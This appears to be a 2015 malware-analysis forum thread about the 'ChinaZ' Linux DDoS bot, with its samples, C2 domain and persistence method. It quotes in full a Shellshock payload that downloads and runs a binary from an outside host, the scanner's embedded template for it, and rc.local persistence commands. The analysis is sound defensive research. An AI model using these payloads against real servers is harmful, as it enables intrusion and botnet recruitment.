A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24936  by unixfreaxjp
 Tue Jan 13, 2015 5:31 pm
The ELF's VT is: https://www.virustotal.com/en/file/92fd ... /analysis/
Out initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n
This threat was detected just recently, via attacks via shellshock:
Code: Select all
/bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >>
 /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget
 http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 
The above request was reported to be generated from Windows version of the shellshock scanner binary with the below trace:
VT is: https://www.virustotal.com/en/file/ae67 ... /analysis/ < noted: LOW detection..
Code: Select all
.rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
.rdata:0057D808                                         ; DATA XREF: StartAddress+124o
.rdata:0057D808                 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
.rdata:0057D808                 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
.rdata:0057D808                 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
.rdata:0057D808                 db 'n.sh;/tmp/Run.sh"',0
The ELF payload was served in a hacked windows system served this ELF with the HFS server:

The calls, subs & function name is obfuscated, yet some new uniq typical characteristics can be spotted like below for the detection purpose:



registration for the autostart is using /etc/rc.local modification:
Code: Select all
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '2 i//ChinaZ' /etc/rc.local
It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor is as per below, noted: not necessarily using hostname basis.
Code: Select all
SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("")}, 16)
SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168
In this particular sample it calls CNC in aa.gm352.com ( at ASN 58543 | | CHINATELECOM-HUNAN-H
Code: Select all
$ my_lookup aa.gm352.com
aa.gm352.com.           300     IN      A
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
$ mycnccheck
Connection to 9521 port [tcp/*] succeeded!

Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this is a new China DDOSer variant: "ChinaZ"
*) Threat found by B of MMD ELF Team
You do not have the required permissions to view the files attached to this post.
 #24982  by unixfreaxjp
 Sat Jan 17, 2015 8:58 pm
The modular version of the ChinaZ in dynamic ELFs (w/shared libs).
Detection ratio is literally ZERO for these modules:
https://www.virustotal.com/en/file/b540 ... /analysis/
https://www.virustotal.com/en/file/a86b ... 421490630/
https://www.virustotal.com/en/file/daaa ... 421491358/
https://www.virustotal.com/en/file/daaa ... 421491358/

Analysis is in MMD blog: http://blog.malwaremustdie.org/2015/01/ ... ml#modular
Please credit #malwaremustdie for this findings.
You do not have the required permissions to view the files attached to this post.
 #24989  by unixfreaxjp
 Sun Jan 18, 2015 7:06 am
I am sorry to write this in the ELF threat, it is so related to the post in http://www.kernelmode.info/forum/viewto ... 682#p24982
Windows version of the ChinaZ client attacker is also spotted in a set of ELF samples.
I wrote the summary of my reversing in VT: https://www.virustotal.com/en/file/714e ... /analysis/
You do not have the required permissions to view the files attached to this post.
 #25132  by ilaloyka
 Mon Feb 02, 2015 12:01 pm
I don't get the malware which shared by you. How to get the malware. I'm sorry.
Hi, What does it mean `DDosWorksServerEeCodeKey` in 8048194
 #26220  by unixfreaxjp
 Wed Jul 01, 2015 1:07 pm
Linux/ChinaZ.DDoS binary builder for x32/x64 (and Win x32) is shared in here for raising the detection ratio of the threat, for research and mitigation purpose.
WARNING! This is not a toy for fun, but a crimeware tool, using this online w/o good handling can create damage on any service will violate the law and can cause your internet service will be blacklisted or worse blocked, so the risk is all yours. Please analyze it in your test environment only.

Please read analysis in MalwareMustDie for the more info and the source of the threat: http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT=NULL: https://www.virustotal.com/en/file/59e6 ... /analysis/


Builder Interface:

Binary templates:

Binary ELF templates contains ChinaZ github codes:

We can not share the Win32 template (N/A) & CNC tools (forbidden by law, it'll be beyond research category for openly shared, I can go to jail), please contact in PM with your detail info to record the share. Sorry for the bummer, please bear with the safety procedure. For the snapshot of CNC tool are in MMD post, VT: https://www.virustotal.com/en/file/8b58 ... /analysis/

#MalwareMustDie's work & share to anti malware community.
You do not have the required permissions to view the files attached to this post.
 #26494  by unixfreaxjp
 Tue Aug 11, 2015 6:52 am
You do not have the required permissions to view the files attached to this post.